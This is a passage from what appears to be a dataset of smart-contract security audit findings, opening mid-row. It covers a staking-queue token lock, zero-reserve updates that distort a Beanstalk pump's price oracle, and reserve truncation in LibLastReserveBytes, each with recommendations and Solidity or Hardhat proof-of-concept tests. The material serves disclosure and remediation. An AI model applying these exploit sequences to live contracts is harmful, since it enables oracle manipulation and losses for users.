unqueueTokens fails because actual totalQueued is zero\\n await expect(sq.connect(signers[1]).unqueueTokens(0, 0, [], toEther(500))).to.be.revertedWith(\\n 'InsufficientQueuedTokens()'\\n )\\n\\n // user's LSD tokens 
are still locked in the queue contract\\n await stakingPool.connect(signers[1]).approve(sq.address, toEther(500))\\n await sq.connect(signers[1]).withdraw(toEther(500))\\n assert.equal(fromEther(await stakingPool.balanceOf(accounts[1])), 0)\\n assert.equal(fromEther(await sq.getQueuedTokens(accounts[1], 0)), 500)\\n assert.equal(fromEther(await token.balanceOf(accounts[1])), 9500)\\n assert.equal(fromEther(await sq.totalQueued()), 0)\\n assert.equal(fromEther(await stakingPool.balanceOf(sq.address)), 500)\\n\\n // user might try withdraw again but it will revert because user does not have any LSD tokens\\n await stakingPool.connect(signers[1]).approve(sq.address, toEther(500))\\n await expect(sq.connect(signers[1]).withdraw(toEther(500))).to.be.revertedWith(\\n 'Transfer amount exceeds balance'\\n )\\n\\n // in conclusion, user's LSD tokens are locked in the queue contract and he cannot withdraw them\\n // it is worth noting that the locked LSD tokens are credited once updateDistribution is called\\n // so the lock is temporary\\n })\\n```\\n","```\\nfunction withdraw(uint256 _amount) external {//@audit-info LSD token\\n if (_amount == 0) revert InvalidAmount();\\n IERC20Upgradeable(address(stakingPool)).safeTransferFrom(msg.sender, address(this), _amount);//@audit-info get LSD token from the user\\n _withdraw(msg.sender, _amount);\\n}\\n```\\n" +Each Well is responsible for ensuring that an `update` call cannot be made with a reserve of 0,high,"The current implementation of `GeoEmaAndCumSmaPump` assumes each well will call `update()` with non-zero reserves, as commented at the beginning of the file:\\n```\\n/**\\n * @title GeoEmaAndCumSmaPump\\n * @author Publius\\n * @notice Stores a geometric EMA and cumulative geometric SMA for each reserve.\\n * @dev A Pump designed for use in Beanstalk with 2 tokens.\\n *\\n * This Pump has 3 main features:\\n * 1. Multi-block MEV resistence reserves\\n * 2. 
MEV-resistant Geometric EMA intended for instantaneous reserve queries\\n * 3. MEV-resistant Cumulative Geometric intended for SMA reserve queries\\n *\\n * Note: If an `update` call is made with a reserve of 0, the Geometric mean oracles will be set to 0.\\n * Each Well is responsible for ensuring that an `update` call cannot be made with a reserve of 0.\\n */\\n```\\n\\nHowever, there is no actual requirement in `Well` to enforce pump updates with valid reserve values. Given that `GeoEmaAndCumSmaPump` restricts values to a minimum of 1 to prevent issues with the geometric mean, that the TWA values are not truly representative of the reserves in the `Well`, we believe it is worse than reverting in this case, although a `ConstantProduct2` `Well` can have zero reserves for either token via valid transactions.\\n```\\nGeoEmaAndCumSmaPump.sol\\n for (uint i; i < length; ++i) {\\n // Use a minimum of 1 for reserve. Geometric means will be set to 0 if a reserve is 0.\\n b.lastReserves[i] =\\n _capReserve(b.lastReserves[i], (reserves[i] > 0 ? reserves[i] : 1).fromUIntToLog2(), blocksPassed);\\n b.emaReserves[i] = b.lastReserves[i].mul((ABDKMathQuad.ONE.sub(aN))).add(b.emaReserves[i].mul(aN));\\n b.cumulativeReserves[i] = b.cumulativeReserves[i].add(b.lastReserves[i].mul(deltaTimestampBytes));\\n }\\n```\\n",Revert the pump updates if they are called with zero reserve values.,"Updating pumps with zero reserve values can lead to the distortion of critical states likely to be utilized for price oracles. Given that the issue is exploitable through valid transactions, we assess the severity as HIGH. 
It is crucial to note that attackers can exploit this vulnerability to manipulate the price oracle.\\nProof of Concept: The test below shows that it is possible for reserves to be zero through valid transactions and updating pumps do not revert.\\n```\\nfunction testUpdateCalledWithZero() public {\\n address msgSender = 0x83a740c22a319FBEe5F2FaD0E8Cd0053dC711a1A;\\n changePrank(msgSender);\\n IERC20[] memory mockTokens = well.tokens();\\n\\n // add liquidity 1 on each side\\n uint amount = 1;\\n MockToken(address(mockTokens[0])).mint(msgSender, 1);\\n MockToken(address(mockTokens[1])).mint(msgSender, 1);\\n MockToken(address(mockTokens[0])).approve(address(well), amount);\\n MockToken(address(mockTokens[1])).approve(address(well), amount);\\n uint[] memory tokenAmountsIn = new uint[](2);\\n tokenAmountsIn[0] = amount;\\n tokenAmountsIn[1] = amount;\\n uint minLpAmountOut = well.getAddLiquidityOut(tokenAmountsIn);\\n well.addLiquidity(\\n tokenAmountsIn,\\n minLpAmountOut,\\n msgSender,\\n block.timestamp\\n );\\n\\n // swaFromFeeOnTransfer from token1 to token0\\n msgSender = 0xfFfFFffFffffFFffFffFFFFFFfFFFfFfFFfFfFfD;\\n changePrank(msgSender);\\n amount = 79_228_162_514_264_337_593_543_950_334;\\n MockToken(address(mockTokens[1])).mint(msgSender, amount);\\n MockToken(address(mockTokens[1])).approve(address(well), amount);\\n uint minAmountOut = well.getSwapOut(\\n mockTokens[1],\\n mockTokens[0],\\n amount\\n );\\n\\n well.swapFromFeeOnTransfer(\\n mockTokens[1],\\n mockTokens[0],\\n amount,\\n minAmountOut,\\n msgSender,\\n block.timestamp\\n );\\n increaseTime(120);\\n\\n // remove liquidity one token\\n msgSender = address(this);\\n changePrank(msgSender);\\n amount = 999_999_999_999_999_999_999_999_999;\\n uint minTokenAmountOut = well.getRemoveLiquidityOneTokenOut(\\n amount,\\n mockTokens[1]\\n );\\n well.removeLiquidityOneToken(\\n amount,\\n mockTokens[1],\\n minTokenAmountOut,\\n msgSender,\\n block.timestamp\\n );\\n\\n msgSender = 
address(12_345_678);\\n changePrank(msgSender);\\n\\n vm.warp(block.timestamp + 1);\\n amount = 1;\\n MockToken(address(mockTokens[0])).mint(msgSender, amount);\\n MockToken(address(mockTokens[0])).approve(address(well), amount);\\n uint amountOut = well.getSwapOut(mockTokens[0], mockTokens[1], amount);\\n\\n uint[] memory reserves = well.getReserves();\\n assertEq(reserves[1], 0);\\n\\n // we are calling `_update` with reserves of 0, this should fail\\n well.swapFrom(\\n mockTokens[0],\\n mockTokens[1],\\n amount,\\n amountOut,\\n msgSender,\\n block.timestamp\\n );\\n}\\n```\\n","```\\n/**\\n * @title GeoEmaAndCumSmaPump\\n * @author Publius\\n * @notice Stores a geometric EMA and cumulative geometric SMA for each reserve.\\n * @dev A Pump designed for use in Beanstalk with 2 tokens.\\n *\\n * This Pump has 3 main features:\\n * 1. Multi-block MEV resistence reserves\\n * 2. MEV-resistant Geometric EMA intended for instantaneous reserve queries\\n * 3. MEV-resistant Cumulative Geometric intended for SMA reserve queries\\n *\\n * Note: If an `update` call is made with a reserve of 0, the Geometric mean oracles will be set to 0.\\n * Each Well is responsible for ensuring that an `update` call cannot be made with a reserve of 0.\\n */\\n```\\n" +`LibLastReserveBytes::storeLastReserves` has no check for reserves being too large,medium,"After every liquidity event & swap, the IPump::update()is called. To update the pump, theLibLastReserveBytes::storeLastReservesfunction is used. This packs the reserve data intobytes32` slots in storage. A slot is then broken down into the following components:\\n1 byte for reserves array length\\n5 bytes for `timestamp`\\n16 bytes for each reserve balance\\nThis adds to 22 bytes total, but the function also attempts to pack the second reserve balance in the `bytes32` object. 
This would mean the `bytes32` would need 38 bytes total:\\n`1(length) + 5(timestamp) + 16(reserve balance 1) + 16(reserve balance 2) = 38 bytes`\\nTo fit all this data into the `bytes32`, the function cuts off the last few bytes of the reserve balances using shift, as shown below.\\n```\\nsrc\\libraries\\LibLastReserveBytes.sol\\n uint8 n = uint8(reserves.length);\\n if (n == 1) {\\n assembly {\\n sstore(slot, or(or(shl(208, lastTimestamp), shl(248, n)), shl(104, shr(152, mload(add(reserves, 32))))))\\n }\\n return;\\n }\\n assembly {\\n sstore(\\n slot,\\n or(\\n or(shl(208, lastTimestamp), shl(248, n)),\\n or(shl(104, shr(152, mload(add(reserves, 32)))), shr(152, mload(add(reserves, 64))))\\n )\\n )\\n // slot := add(slot, 32)\\n }\\n```\\n\\nSo if the amount being stored is too large, the actual stored value will be different than what was expected to be stored.\\nOn the other hand, the `LibBytes.sol` does seem to have a check:\\n```\\nrequire(reserves[0] <= type(uint128).max, ""ByteStorage: too large"");\\n```\\n\\nThe `_setReserves` function calls this library after every reserve update in the well. 
So in practice, with the currently implemented wells & pumps, this check would cause a revert.\\nHowever, a well that is implemented without this check could additionally trigger the pumps to cut off reserve data, meaning prices would be incorrect.","We recommend adding a check on the size of reserves in `LibLastReserveBytes`.\\nAdditionally, it is recommended to add comments to `LibLastReserveBytes` to inform users about the invariants of the system and how the max size of reserves should be equal to the max size of a `bytes16` and not a `uint256`.","While we assume users will be explicitly warned about malicious Wells and are unlikely to interact with invalid Wells, we assess the severity to be MEDIUM.\\nProof of Concept:\\n```\\nfunction testStoreAndReadTwo() public {\\n uint40 lastTimeStamp = 12345363;\\n bytes16[] memory reserves = new bytes16[](2);\\n reserves[0] = 0xffffffffffffffffffffffffffffffff; // This is too big!\\n reserves[1] = 0x11111111111111111111111100000000;\\n RESERVES_STORAGE_SLOT.storeLastReserves(lastTimeStamp, reserves);\\n (\\n uint8 n,\\n uint40 _lastTimeStamp,\\n bytes16[] memory _reserves\\n ) = RESERVES_STORAGE_SLOT.readLastReserves();\\n assertEq(2, n);\\n assertEq(lastTimeStamp, _lastTimeStamp);\\n assertEq(reserves[0], _reserves[0]); // This will fail\\n assertEq(reserves[1], _reserves[1]);\\n assertEq(reserves.length, _reserves.length);\\n}\\n```\\n","```\\nsrc\\libraries\\LibLastReserveBytes.sol\\n uint8 n = uint8(reserves.length);\\n if (n == 1) {\\n assembly {\\n sstore(slot, or(or(shl(208, lastTimestamp), shl(248, n)), shl(104, shr(152, mload(add(reserves, 32))))))\\n }\\n return;\\n }\\n assembly {\\n sstore(\\n slot,\\n or(\\n or(shl(208, lastTimestamp), shl(248, n)),\\n or(shl(104, shr(152, mload(add(reserves, 32)))), shr(152, mload(add(reserves, 64))))\\n )\\n )\\n // slot := add(slot, 32)\\n }\\n```\\n"